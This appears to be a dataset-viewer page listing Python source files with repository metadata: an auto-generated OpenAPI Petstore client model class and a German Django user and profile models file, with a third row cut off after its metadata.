Dataset columns (type and observed value range; ⌀ marks columns that contain null values):

| Column | Type | Range |
|---|---|---|
| hexsha | string | length exactly 40 |
| size | int64 | 6 to 1.04M |
| ext | string | 10 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | length 4 to 247 |
| max_stars_repo_name | string | length 4 to 130 |
| max_stars_repo_head_hexsha | string | length 40 to 78 |
| max_stars_repo_licenses | list | length 1 to 10 |
| max_stars_count | int64 | 1 to 368k ⌀ |
| max_stars_repo_stars_event_min_datetime | string | length exactly 24 ⌀ |
| max_stars_repo_stars_event_max_datetime | string | length exactly 24 ⌀ |
| max_issues_repo_path | string | length 4 to 247 |
| max_issues_repo_name | string | length 4 to 130 |
| max_issues_repo_head_hexsha | string | length 40 to 78 |
| max_issues_repo_licenses | list | length 1 to 10 |
| max_issues_count | int64 | 1 to 116k ⌀ |
| max_issues_repo_issues_event_min_datetime | string | length exactly 24 ⌀ |
| max_issues_repo_issues_event_max_datetime | string | length exactly 24 ⌀ |
| max_forks_repo_path | string | length 4 to 247 |
| max_forks_repo_name | string | length 4 to 130 |
| max_forks_repo_head_hexsha | string | length 40 to 78 |
| max_forks_repo_licenses | list | length 1 to 10 |
| max_forks_count | int64 | 1 to 105k ⌀ |
| max_forks_repo_forks_event_min_datetime | string | length exactly 24 ⌀ |
| max_forks_repo_forks_event_max_datetime | string | length exactly 24 ⌀ |
| content | string | length 1 to 1.04M |
| avg_line_length | float64 | 1.53 to 618k |
| max_line_length | int64 | 1 to 1.02M |
| alphanum_fraction | float64 | 0 to 1 |
| original_content | string | length 6 to 1.04M |
| filtered:remove_non_ascii | int64 | 0 to 538k |
| filtered:remove_decorators | int64 | 0 to 917k |
| filtered:remove_async | int64 | 0 to 722k |
| filtered:remove_classes | int64 | -45 to 1M |
| filtered:remove_generators | int64 | 0 to 814k |
| filtered:remove_function_no_docstring | int64 | -102 to 850k |
| filtered:remove_class_no_docstring | int64 | -3 to 5.46k |
| filtered:remove_unused_imports | int64 | -1,350 to 52.4k |
| filtered:remove_delete_markers | int64 | 0 to 59.6k |
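Reading the schema: `original_content` is the raw source file and `content` is the same file after the `filtered:*` passes; each `filtered:*` column appears to record the per-pass character delta. The sketch below loads such a split and compares the summed deltas against the length difference between the two content columns. It is a minimal sketch under stated assumptions: the rows are published as a Hugging Face dataset, and the id `your-org/python-filtered-stack` is a placeholder, since the card does not name one.

```python
# Minimal sketch (assumption: "your-org/python-filtered-stack" is a placeholder
# dataset id, not taken from this card).
from datasets import load_dataset

FILTER_COLUMNS = [
    "filtered:remove_non_ascii",
    "filtered:remove_decorators",
    "filtered:remove_async",
    "filtered:remove_classes",
    "filtered:remove_generators",
    "filtered:remove_function_no_docstring",
    "filtered:remove_class_no_docstring",
    "filtered:remove_unused_imports",
    "filtered:remove_delete_markers",
]

ds = load_dataset("your-org/python-filtered-stack", split="train")

for row in ds.select(range(3)):
    removed = sum(row[col] for col in FILTER_COLUMNS)          # sum of per-pass deltas
    shrunk = len(row["original_content"]) - len(row["content"])  # actual size change
    print(row["max_stars_repo_name"], row["max_stars_repo_path"])
    print(f"  sum of filtered:* = {removed}; original minus filtered length = {shrunk}")
```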
Row 1
- hexsha: f7ded778c29259e2a89bf5a9a9ac772ebb515972 · size: 25,965 · ext: py · lang: Python
- path: samples/client/petstore/python-experimental/petstore_api/models/xml_item.py · repo: malymato/openapi-generator @ 47e2c0d027d867de67633bbc9c0a5d7e1054a778 · licenses: ["Apache-2.0"] (identical across the stars, issues and forks column groups)
- max_stars_count: 2 (2019-12-08T12:00:11.000Z to 2022-01-02T13:47:52.000Z) · max_issues_count: 8 (2021-03-01T21:18:19.000Z to 2022-02-27T07:56:15.000Z) · max_forks_count: 1 (2020-03-08T12:31:09.000Z to 2020-03-08T12:31:09.000Z)
- content (after the filtered:* passes):
# coding: utf-8
"""
OpenAPI Petstore
This spec is mainly for testing Petstore server and contains fake endpoints, models. Please do not use this for any other purpose. Special characters: \" \\ # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
avg_line_length: 35.135318 · max_line_length: 174 · alphanum_fraction: 0.605507

original_content:
# coding: utf-8
"""
OpenAPI Petstore
This spec is mainly for testing Petstore server and contains fake endpoints, models. Please do not use this for any other purpose. Special characters: \" \\ # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import pprint # noqa: F401
import re # noqa: F401
import six # noqa: F401
from petstore_api.exceptions import ( # noqa: F401
ApiKeyError,
ApiTypeError,
ApiValueError,
)
from petstore_api.model_utils import ( # noqa: F401
ModelNormal,
ModelSimple,
check_allowed_values,
check_validations,
date,
datetime,
file_type,
get_simple_class,
int,
model_to_dict,
none_type,
str,
type_error_message,
validate_and_convert_types
)
class XmlItem(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
openapi_types (dict): The key is attribute name
and the value is attribute type.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
attribute_map = {
'attribute_string': 'attribute_string', # noqa: E501
'attribute_number': 'attribute_number', # noqa: E501
'attribute_integer': 'attribute_integer', # noqa: E501
'attribute_boolean': 'attribute_boolean', # noqa: E501
'wrapped_array': 'wrapped_array', # noqa: E501
'name_string': 'name_string', # noqa: E501
'name_number': 'name_number', # noqa: E501
'name_integer': 'name_integer', # noqa: E501
'name_boolean': 'name_boolean', # noqa: E501
'name_array': 'name_array', # noqa: E501
'name_wrapped_array': 'name_wrapped_array', # noqa: E501
'prefix_string': 'prefix_string', # noqa: E501
'prefix_number': 'prefix_number', # noqa: E501
'prefix_integer': 'prefix_integer', # noqa: E501
'prefix_boolean': 'prefix_boolean', # noqa: E501
'prefix_array': 'prefix_array', # noqa: E501
'prefix_wrapped_array': 'prefix_wrapped_array', # noqa: E501
'namespace_string': 'namespace_string', # noqa: E501
'namespace_number': 'namespace_number', # noqa: E501
'namespace_integer': 'namespace_integer', # noqa: E501
'namespace_boolean': 'namespace_boolean', # noqa: E501
'namespace_array': 'namespace_array', # noqa: E501
'namespace_wrapped_array': 'namespace_wrapped_array', # noqa: E501
'prefix_ns_string': 'prefix_ns_string', # noqa: E501
'prefix_ns_number': 'prefix_ns_number', # noqa: E501
'prefix_ns_integer': 'prefix_ns_integer', # noqa: E501
'prefix_ns_boolean': 'prefix_ns_boolean', # noqa: E501
'prefix_ns_array': 'prefix_ns_array', # noqa: E501
'prefix_ns_wrapped_array': 'prefix_ns_wrapped_array' # noqa: E501
}
openapi_types = {
'attribute_string': (str,), # noqa: E501
'attribute_number': (float,), # noqa: E501
'attribute_integer': (int,), # noqa: E501
'attribute_boolean': (bool,), # noqa: E501
'wrapped_array': ([int],), # noqa: E501
'name_string': (str,), # noqa: E501
'name_number': (float,), # noqa: E501
'name_integer': (int,), # noqa: E501
'name_boolean': (bool,), # noqa: E501
'name_array': ([int],), # noqa: E501
'name_wrapped_array': ([int],), # noqa: E501
'prefix_string': (str,), # noqa: E501
'prefix_number': (float,), # noqa: E501
'prefix_integer': (int,), # noqa: E501
'prefix_boolean': (bool,), # noqa: E501
'prefix_array': ([int],), # noqa: E501
'prefix_wrapped_array': ([int],), # noqa: E501
'namespace_string': (str,), # noqa: E501
'namespace_number': (float,), # noqa: E501
'namespace_integer': (int,), # noqa: E501
'namespace_boolean': (bool,), # noqa: E501
'namespace_array': ([int],), # noqa: E501
'namespace_wrapped_array': ([int],), # noqa: E501
'prefix_ns_string': (str,), # noqa: E501
'prefix_ns_number': (float,), # noqa: E501
'prefix_ns_integer': (int,), # noqa: E501
'prefix_ns_boolean': (bool,), # noqa: E501
'prefix_ns_array': ([int],), # noqa: E501
'prefix_ns_wrapped_array': ([int],), # noqa: E501
}
validations = {
}
additional_properties_type = None
discriminator = None
def __init__(self, _check_type=True, _from_server=False, _path_to_item=(), _configuration=None, **kwargs): # noqa: E501
"""XmlItem - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_from_server (bool): True if the data is from the server
False if the data is from the client (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
attribute_string (str): [optional] # noqa: E501
attribute_number (float): [optional] # noqa: E501
attribute_integer (int): [optional] # noqa: E501
attribute_boolean (bool): [optional] # noqa: E501
wrapped_array ([int]): [optional] # noqa: E501
name_string (str): [optional] # noqa: E501
name_number (float): [optional] # noqa: E501
name_integer (int): [optional] # noqa: E501
name_boolean (bool): [optional] # noqa: E501
name_array ([int]): [optional] # noqa: E501
name_wrapped_array ([int]): [optional] # noqa: E501
prefix_string (str): [optional] # noqa: E501
prefix_number (float): [optional] # noqa: E501
prefix_integer (int): [optional] # noqa: E501
prefix_boolean (bool): [optional] # noqa: E501
prefix_array ([int]): [optional] # noqa: E501
prefix_wrapped_array ([int]): [optional] # noqa: E501
namespace_string (str): [optional] # noqa: E501
namespace_number (float): [optional] # noqa: E501
namespace_integer (int): [optional] # noqa: E501
namespace_boolean (bool): [optional] # noqa: E501
namespace_array ([int]): [optional] # noqa: E501
namespace_wrapped_array ([int]): [optional] # noqa: E501
prefix_ns_string (str): [optional] # noqa: E501
prefix_ns_number (float): [optional] # noqa: E501
prefix_ns_integer (int): [optional] # noqa: E501
prefix_ns_boolean (bool): [optional] # noqa: E501
prefix_ns_array ([int]): [optional] # noqa: E501
prefix_ns_wrapped_array ([int]): [optional] # noqa: E501
"""
self._data_store = {}
self._check_type = _check_type
self._from_server = _from_server
self._path_to_item = _path_to_item
self._configuration = _configuration
for var_name, var_value in six.iteritems(kwargs):
self.__set_item(var_name, var_value)
def __set_item(self, name, value):
path_to_item = []
if self._path_to_item:
path_to_item.extend(self._path_to_item)
path_to_item.append(name)
if name in self.openapi_types:
required_types_mixed = self.openapi_types[name]
elif self.additional_properties_type is None:
raise ApiKeyError(
"{0} has no key '{1}'".format(type(self).__name__, name),
path_to_item
)
elif self.additional_properties_type is not None:
required_types_mixed = self.additional_properties_type
if get_simple_class(name) != str:
error_msg = type_error_message(
var_name=name,
var_value=name,
valid_classes=(str,),
key_type=True
)
raise ApiTypeError(
error_msg,
path_to_item=path_to_item,
valid_classes=(str,),
key_type=True
)
if self._check_type:
value = validate_and_convert_types(
value, required_types_mixed, path_to_item, self._from_server,
self._check_type, configuration=self._configuration)
if (name,) in self.allowed_values:
check_allowed_values(
self.allowed_values,
(name,),
value
)
if (name,) in self.validations:
check_validations(
self.validations,
(name,),
value
)
self._data_store[name] = value
def __get_item(self, name):
if name in self._data_store:
return self._data_store[name]
path_to_item = []
if self._path_to_item:
path_to_item.extend(self._path_to_item)
path_to_item.append(name)
raise ApiKeyError(
"{0} has no key '{1}'".format(type(self).__name__, name),
[name]
)
def __setitem__(self, name, value):
"""this allows us to set values with instance[field_name] = val"""
self.__set_item(name, value)
def __getitem__(self, name):
"""this allows us to get a value with val = instance[field_name]"""
return self.__get_item(name)
@property
def attribute_string(self):
"""Gets the attribute_string of this XmlItem. # noqa: E501
Returns:
(str): The attribute_string of this XmlItem. # noqa: E501
"""
return self.__get_item('attribute_string')
@attribute_string.setter
def attribute_string(self, value):
"""Sets the attribute_string of this XmlItem. # noqa: E501
"""
return self.__set_item('attribute_string', value)
@property
def attribute_number(self):
"""Gets the attribute_number of this XmlItem. # noqa: E501
Returns:
(float): The attribute_number of this XmlItem. # noqa: E501
"""
return self.__get_item('attribute_number')
@attribute_number.setter
def attribute_number(self, value):
"""Sets the attribute_number of this XmlItem. # noqa: E501
"""
return self.__set_item('attribute_number', value)
@property
def attribute_integer(self):
"""Gets the attribute_integer of this XmlItem. # noqa: E501
Returns:
(int): The attribute_integer of this XmlItem. # noqa: E501
"""
return self.__get_item('attribute_integer')
@attribute_integer.setter
def attribute_integer(self, value):
"""Sets the attribute_integer of this XmlItem. # noqa: E501
"""
return self.__set_item('attribute_integer', value)
@property
def attribute_boolean(self):
"""Gets the attribute_boolean of this XmlItem. # noqa: E501
Returns:
(bool): The attribute_boolean of this XmlItem. # noqa: E501
"""
return self.__get_item('attribute_boolean')
@attribute_boolean.setter
def attribute_boolean(self, value):
"""Sets the attribute_boolean of this XmlItem. # noqa: E501
"""
return self.__set_item('attribute_boolean', value)
@property
def wrapped_array(self):
"""Gets the wrapped_array of this XmlItem. # noqa: E501
Returns:
([int]): The wrapped_array of this XmlItem. # noqa: E501
"""
return self.__get_item('wrapped_array')
@wrapped_array.setter
def wrapped_array(self, value):
"""Sets the wrapped_array of this XmlItem. # noqa: E501
"""
return self.__set_item('wrapped_array', value)
@property
def name_string(self):
"""Gets the name_string of this XmlItem. # noqa: E501
Returns:
(str): The name_string of this XmlItem. # noqa: E501
"""
return self.__get_item('name_string')
@name_string.setter
def name_string(self, value):
"""Sets the name_string of this XmlItem. # noqa: E501
"""
return self.__set_item('name_string', value)
@property
def name_number(self):
"""Gets the name_number of this XmlItem. # noqa: E501
Returns:
(float): The name_number of this XmlItem. # noqa: E501
"""
return self.__get_item('name_number')
@name_number.setter
def name_number(self, value):
"""Sets the name_number of this XmlItem. # noqa: E501
"""
return self.__set_item('name_number', value)
@property
def name_integer(self):
"""Gets the name_integer of this XmlItem. # noqa: E501
Returns:
(int): The name_integer of this XmlItem. # noqa: E501
"""
return self.__get_item('name_integer')
@name_integer.setter
def name_integer(self, value):
"""Sets the name_integer of this XmlItem. # noqa: E501
"""
return self.__set_item('name_integer', value)
@property
def name_boolean(self):
"""Gets the name_boolean of this XmlItem. # noqa: E501
Returns:
(bool): The name_boolean of this XmlItem. # noqa: E501
"""
return self.__get_item('name_boolean')
@name_boolean.setter
def name_boolean(self, value):
"""Sets the name_boolean of this XmlItem. # noqa: E501
"""
return self.__set_item('name_boolean', value)
@property
def name_array(self):
"""Gets the name_array of this XmlItem. # noqa: E501
Returns:
([int]): The name_array of this XmlItem. # noqa: E501
"""
return self.__get_item('name_array')
@name_array.setter
def name_array(self, value):
"""Sets the name_array of this XmlItem. # noqa: E501
"""
return self.__set_item('name_array', value)
@property
def name_wrapped_array(self):
"""Gets the name_wrapped_array of this XmlItem. # noqa: E501
Returns:
([int]): The name_wrapped_array of this XmlItem. # noqa: E501
"""
return self.__get_item('name_wrapped_array')
@name_wrapped_array.setter
def name_wrapped_array(self, value):
"""Sets the name_wrapped_array of this XmlItem. # noqa: E501
"""
return self.__set_item('name_wrapped_array', value)
@property
def prefix_string(self):
"""Gets the prefix_string of this XmlItem. # noqa: E501
Returns:
(str): The prefix_string of this XmlItem. # noqa: E501
"""
return self.__get_item('prefix_string')
@prefix_string.setter
def prefix_string(self, value):
"""Sets the prefix_string of this XmlItem. # noqa: E501
"""
return self.__set_item('prefix_string', value)
@property
def prefix_number(self):
"""Gets the prefix_number of this XmlItem. # noqa: E501
Returns:
(float): The prefix_number of this XmlItem. # noqa: E501
"""
return self.__get_item('prefix_number')
@prefix_number.setter
def prefix_number(self, value):
"""Sets the prefix_number of this XmlItem. # noqa: E501
"""
return self.__set_item('prefix_number', value)
@property
def prefix_integer(self):
"""Gets the prefix_integer of this XmlItem. # noqa: E501
Returns:
(int): The prefix_integer of this XmlItem. # noqa: E501
"""
return self.__get_item('prefix_integer')
@prefix_integer.setter
def prefix_integer(self, value):
"""Sets the prefix_integer of this XmlItem. # noqa: E501
"""
return self.__set_item('prefix_integer', value)
@property
def prefix_boolean(self):
"""Gets the prefix_boolean of this XmlItem. # noqa: E501
Returns:
(bool): The prefix_boolean of this XmlItem. # noqa: E501
"""
return self.__get_item('prefix_boolean')
@prefix_boolean.setter
def prefix_boolean(self, value):
"""Sets the prefix_boolean of this XmlItem. # noqa: E501
"""
return self.__set_item('prefix_boolean', value)
@property
def prefix_array(self):
"""Gets the prefix_array of this XmlItem. # noqa: E501
Returns:
([int]): The prefix_array of this XmlItem. # noqa: E501
"""
return self.__get_item('prefix_array')
@prefix_array.setter
def prefix_array(self, value):
"""Sets the prefix_array of this XmlItem. # noqa: E501
"""
return self.__set_item('prefix_array', value)
@property
def prefix_wrapped_array(self):
"""Gets the prefix_wrapped_array of this XmlItem. # noqa: E501
Returns:
([int]): The prefix_wrapped_array of this XmlItem. # noqa: E501
"""
return self.__get_item('prefix_wrapped_array')
@prefix_wrapped_array.setter
def prefix_wrapped_array(self, value):
"""Sets the prefix_wrapped_array of this XmlItem. # noqa: E501
"""
return self.__set_item('prefix_wrapped_array', value)
@property
def namespace_string(self):
"""Gets the namespace_string of this XmlItem. # noqa: E501
Returns:
(str): The namespace_string of this XmlItem. # noqa: E501
"""
return self.__get_item('namespace_string')
@namespace_string.setter
def namespace_string(self, value):
"""Sets the namespace_string of this XmlItem. # noqa: E501
"""
return self.__set_item('namespace_string', value)
@property
def namespace_number(self):
"""Gets the namespace_number of this XmlItem. # noqa: E501
Returns:
(float): The namespace_number of this XmlItem. # noqa: E501
"""
return self.__get_item('namespace_number')
@namespace_number.setter
def namespace_number(self, value):
"""Sets the namespace_number of this XmlItem. # noqa: E501
"""
return self.__set_item('namespace_number', value)
@property
def namespace_integer(self):
"""Gets the namespace_integer of this XmlItem. # noqa: E501
Returns:
(int): The namespace_integer of this XmlItem. # noqa: E501
"""
return self.__get_item('namespace_integer')
@namespace_integer.setter
def namespace_integer(self, value):
"""Sets the namespace_integer of this XmlItem. # noqa: E501
"""
return self.__set_item('namespace_integer', value)
@property
def namespace_boolean(self):
"""Gets the namespace_boolean of this XmlItem. # noqa: E501
Returns:
(bool): The namespace_boolean of this XmlItem. # noqa: E501
"""
return self.__get_item('namespace_boolean')
@namespace_boolean.setter
def namespace_boolean(self, value):
"""Sets the namespace_boolean of this XmlItem. # noqa: E501
"""
return self.__set_item('namespace_boolean', value)
@property
def namespace_array(self):
"""Gets the namespace_array of this XmlItem. # noqa: E501
Returns:
([int]): The namespace_array of this XmlItem. # noqa: E501
"""
return self.__get_item('namespace_array')
@namespace_array.setter
def namespace_array(self, value):
"""Sets the namespace_array of this XmlItem. # noqa: E501
"""
return self.__set_item('namespace_array', value)
@property
def namespace_wrapped_array(self):
"""Gets the namespace_wrapped_array of this XmlItem. # noqa: E501
Returns:
([int]): The namespace_wrapped_array of this XmlItem. # noqa: E501
"""
return self.__get_item('namespace_wrapped_array')
@namespace_wrapped_array.setter
def namespace_wrapped_array(self, value):
"""Sets the namespace_wrapped_array of this XmlItem. # noqa: E501
"""
return self.__set_item('namespace_wrapped_array', value)
@property
def prefix_ns_string(self):
"""Gets the prefix_ns_string of this XmlItem. # noqa: E501
Returns:
(str): The prefix_ns_string of this XmlItem. # noqa: E501
"""
return self.__get_item('prefix_ns_string')
@prefix_ns_string.setter
def prefix_ns_string(self, value):
"""Sets the prefix_ns_string of this XmlItem. # noqa: E501
"""
return self.__set_item('prefix_ns_string', value)
@property
def prefix_ns_number(self):
"""Gets the prefix_ns_number of this XmlItem. # noqa: E501
Returns:
(float): The prefix_ns_number of this XmlItem. # noqa: E501
"""
return self.__get_item('prefix_ns_number')
@prefix_ns_number.setter
def prefix_ns_number(self, value):
"""Sets the prefix_ns_number of this XmlItem. # noqa: E501
"""
return self.__set_item('prefix_ns_number', value)
@property
def prefix_ns_integer(self):
"""Gets the prefix_ns_integer of this XmlItem. # noqa: E501
Returns:
(int): The prefix_ns_integer of this XmlItem. # noqa: E501
"""
return self.__get_item('prefix_ns_integer')
@prefix_ns_integer.setter
def prefix_ns_integer(self, value):
"""Sets the prefix_ns_integer of this XmlItem. # noqa: E501
"""
return self.__set_item('prefix_ns_integer', value)
@property
def prefix_ns_boolean(self):
"""Gets the prefix_ns_boolean of this XmlItem. # noqa: E501
Returns:
(bool): The prefix_ns_boolean of this XmlItem. # noqa: E501
"""
return self.__get_item('prefix_ns_boolean')
@prefix_ns_boolean.setter
def prefix_ns_boolean(self, value):
"""Sets the prefix_ns_boolean of this XmlItem. # noqa: E501
"""
return self.__set_item('prefix_ns_boolean', value)
@property
def prefix_ns_array(self):
"""Gets the prefix_ns_array of this XmlItem. # noqa: E501
Returns:
([int]): The prefix_ns_array of this XmlItem. # noqa: E501
"""
return self.__get_item('prefix_ns_array')
@prefix_ns_array.setter
def prefix_ns_array(self, value):
"""Sets the prefix_ns_array of this XmlItem. # noqa: E501
"""
return self.__set_item('prefix_ns_array', value)
@property
def prefix_ns_wrapped_array(self):
"""Gets the prefix_ns_wrapped_array of this XmlItem. # noqa: E501
Returns:
([int]): The prefix_ns_wrapped_array of this XmlItem. # noqa: E501
"""
return self.__get_item('prefix_ns_wrapped_array')
@prefix_ns_wrapped_array.setter
def prefix_ns_wrapped_array(self, value):
"""Sets the prefix_ns_wrapped_array of this XmlItem. # noqa: E501
"""
return self.__set_item('prefix_ns_wrapped_array', value)
def to_dict(self):
"""Returns the model properties as a dict"""
return model_to_dict(self, serialize=False)
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, XmlItem):
return False
if not set(self._data_store.keys()) == set(other._data_store.keys()):
return False
for _var_name, this_val in six.iteritems(self._data_store):
that_val = other._data_store[_var_name]
types = set()
types.add(this_val.__class__)
types.add(that_val.__class__)
vals_equal = this_val == that_val
if (not six.PY3 and
len(types) == 2 and unicode in types): # noqa: F821
vals_equal = (
this_val.encode('utf-8') == that_val.encode('utf-8')
)
if not vals_equal:
return False
return True
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
filtered: remove_non_ascii 0 · remove_decorators 12,077 · remove_async 0 · remove_classes 13,050 · remove_generators 0 · remove_function_no_docstring 0 · remove_class_no_docstring 0 · remove_unused_imports 339 · remove_delete_markers 178
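As the docstrings in this row's file note, `XmlItem` keeps its values in an internal `_data_store` and exposes them both as properties and through `instance[field_name]`, with `openapi_types` driving type checking. A small usage sketch, assuming the generated `petstore_api` package from this repo is installed:

```python
# Usage sketch (assumption: the generated petstore_api package is importable).
from petstore_api.models.xml_item import XmlItem

item = XmlItem(attribute_string="string", attribute_number=1.234, wrapped_array=[1, 2, 3])

print(item.attribute_string)       # property access -> "string"
print(item["attribute_number"])    # dict-style access hits the same _data_store

item["attribute_boolean"] = True   # validated against openapi_types before storing
print(item.to_dict())              # plain dict of the fields that were set
```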
Row 2
- hexsha: 9cc0213534d4746545b92434c9c6e16f37a99b1a · size: 4,745 · ext: py · lang: Python
- path: Grundgeruest/models.py · repo: wmles/olymp @ 97b1a256982c2a75c39ba3a855b63a147d4409c5 · licenses: ["MIT"] (identical across the stars, issues and forks column groups)
- max_stars_count / max_issues_count / max_forks_count and their event datetimes: null
- content (after the filtered:* passes):
"""
Die Modelle fr Projektweite Daten: Nutzer/Profile
"""
from django.urls import reverse
def knoepfe_kopf(user):
""" gibt Knpfe fr Kopfleiste als Liste von Tupeln zurck """
anmelden = (reverse('userena_signin'), 'Anmelden')
registrieren = (reverse('userena_signup'), 'Registrieren')
abmelden = (reverse('userena_signout'), 'Abmelden')
profil = lambda nutzer: (reverse('userena_profile_detail',
kwargs={'username': nutzer.username}), 'Profil')
spam = ('spam', 'spam')
admin = ('/admin/', 'admin')
if user.username == 'admin':
liste = [abmelden, profil(user), spam]
elif user.is_authenticated():
liste = [abmelden, profil(user)]
else:
liste = [anmelden, registrieren]
if user.is_staff and user.get_all_permissions():
liste.append(admin)
return liste
def knoepfe_men(user):
""" gibt Knpfe fr Menleiste als Liste von Tupeln zurck """
alle = {
'index': ('/', 'Startseite'),
'olymp': (reverse('Wettbewerbe:index'), 'Wettbewerbe'),
'ehemalige': (reverse('Ehemalige:index'), 'Ehemalige'),
'impressum': (reverse('impressum'), 'Impressum'),
'db': ('https://olymp.piokg.de/static/db.pdf', 'Datenbanklayout'), # quick and very dirty :)
'todo': ('/todo/', 'ToDo-Liste'),
}
if user.username == 'admin':
return [alle[name] for name in ('index', 'olymp', 'ehemalige', 'todo', 'db')]
else:
return [alle[name] for name in ('index', 'olymp', 'db', 'impressum')]
avg_line_length: 32.278912 · max_line_length: 100 · alphanum_fraction: 0.616228

original_content:
"""
Die Modelle für Projektweite Daten: Nutzer/Profile
"""
from django.db import models
from django.contrib.auth.models import AbstractUser
from django.conf import settings
from django.utils.translation import ugettext as _
from userena.models import UserenaBaseProfile
from django.core.validators import RegexValidator
import random, string
from django.template.defaultfilters import slugify
from django.urls import reverse
class MinimalModel(models.Model):
zeit_erstellt = models.DateTimeField(
auto_now_add=True,
editable=False)
zeit_geaendert = models.DateTimeField(
auto_now=True,
editable=False)
class Meta:
abstract = True
ordering = ["-zeit_geaendert"]
def __str__(self):
        return self.__class__.__name__ + ' geändert ' + str(self.zeit_geaendert)
class Grundklasse(MinimalModel):
bezeichnung = models.CharField(max_length=30)
slug = models.SlugField(
max_length=30,
null=False,
blank=True)
def save(self, **kwargs):
if not self.slug:
self.slug = slugify(self.bezeichnung)
super(Grundklasse, self).save()
class Meta:
abstract = True
ordering = ["bezeichnung"]
def __str__(self):
return str(self.bezeichnung)
def knoepfe_kopf(user):
""" gibt Knöpfe für Kopfleiste als Liste von Tupeln zurück """
anmelden = (reverse('userena_signin'), 'Anmelden')
registrieren = (reverse('userena_signup'), 'Registrieren')
abmelden = (reverse('userena_signout'), 'Abmelden')
profil = lambda nutzer: (reverse('userena_profile_detail',
kwargs={'username': nutzer.username}), 'Profil')
spam = ('spam', 'spam')
admin = ('/admin/', 'admin')
if user.username == 'admin':
liste = [abmelden, profil(user), spam]
elif user.is_authenticated():
liste = [abmelden, profil(user)]
else:
liste = [anmelden, registrieren]
if user.is_staff and user.get_all_permissions():
liste.append(admin)
return liste
def knoepfe_menü(user):
""" gibt Knöpfe für Menüleiste als Liste von Tupeln zurück """
alle = {
'index': ('/', 'Startseite'),
'olymp': (reverse('Wettbewerbe:index'), 'Wettbewerbe'),
'ehemalige': (reverse('Ehemalige:index'), 'Ehemalige'),
'impressum': (reverse('impressum'), 'Impressum'),
'db': ('https://olymp.piokg.de/static/db.pdf', 'Datenbanklayout'), # quick and very dirty :)
'todo': ('/todo/', 'ToDo-Liste'),
}
if user.username == 'admin':
return [alle[name] for name in ('index', 'olymp', 'ehemalige', 'todo', 'db')]
else:
return [alle[name] for name in ('index', 'olymp', 'db', 'impressum')]
class Nutzer(AbstractUser):
""" Nutzer-Klasse """
def knoepfe_kopf(nutzer):
""" soll Liste von Paaren für Knöpfe der Kopfleiste ausgeben
Nutzt im Moment die module-fkt gleichen Namens, könnte später vll
die Gruppenzugehörigkeit heranziehen, etc, ist flexibel """
return knoepfe_kopf(nutzer)
def knoepfe_menü(self):
""" soll Liste von Paaren für Knöpfe der Menüleiste ausgeben
Nutzt im Moment die module-fkt gleichen Namens, könnte später vll
die Gruppenzugehörigkeit heranziehen, etc, ist flexibel """
return knoepfe_menü(self)
def save(self, *args, **kwargs):
if not self.username:
self.username = ''.join(random.sample(string.ascii_lowercase, 20))
super(Nutzer, self).save(*args, **kwargs)
class Meta:
verbose_name_plural = 'Nutzer'
verbose_name = 'Nutzer'
def __str__(self):
return 'Nutzer %s (%s)' % (self.username, self.email)
class Nutzerprofil(UserenaBaseProfile):
user = models.OneToOneField(settings.AUTH_USER_MODEL,
unique=True,
verbose_name=_('Nutzer'),
related_name='my_profile')
geschlecht = models.CharField(
max_length=1,
choices=[('w', 'weiblich'), ('m', 'männlich'), (' ', 'sonstiges')],
default=' ')
tel = models.CharField(
max_length=20,
null=True, blank=True)
strasse = models.CharField(
max_length=30,
blank=True)
plz = models.CharField(
max_length = 5,
validators=[RegexValidator('^[0-9]+$')],
blank=True)
ort = models.CharField(
max_length=30,
blank=True)
anredename = models.CharField(
max_length=30,
null=True, blank=True)
class Meta():
verbose_name = 'Nutzerprofil'
verbose_name_plural = 'Nutzerprofile'
filtered: remove_non_ascii 48 · remove_decorators 0 · remove_async 0 · remove_classes 2,713 · remove_generators 0 · remove_function_no_docstring 0 · remove_class_no_docstring 0 · remove_unused_imports 158 · remove_delete_markers 269
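One detail worth calling out in this row's file: `Grundklasse.save()` auto-fills `slug` from `bezeichnung` via `slugify()` when the slug is empty. The sketch below illustrates that behaviour with a hypothetical concrete subclass (`Wettbewerb` is illustrative and not defined in this file) and would only run inside a configured Django project.

```python
# Illustrative only: Wettbewerb is a hypothetical subclass, not part of this row's file.
from Grundgeruest.models import Grundklasse


class Wettbewerb(Grundklasse):
    """Concrete model; inherits bezeichnung, slug and the timestamp fields."""


# Inside a configured Django project with migrations applied:
#   w = Wettbewerb(bezeichnung="Bundesrunde 2018")
#   w.save()    # slug was empty, so save() fills it via slugify()
#   w.slug      # -> "bundesrunde-2018"
```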
Row 3
- hexsha: b3e937dcb8ac9e14cc91bc39a1395544f1f257fb · size: 8,595 · ext: py · lang: Python
- path: dataset/datasets.py · repo: notplus/FaceLandmark_PFLD_UltraLight @ 89aa36d5369f7d8d6661eb67d8490c774ea4685a · licenses: ["Apache-2.0"] (identical across the stars, issues and forks column groups)
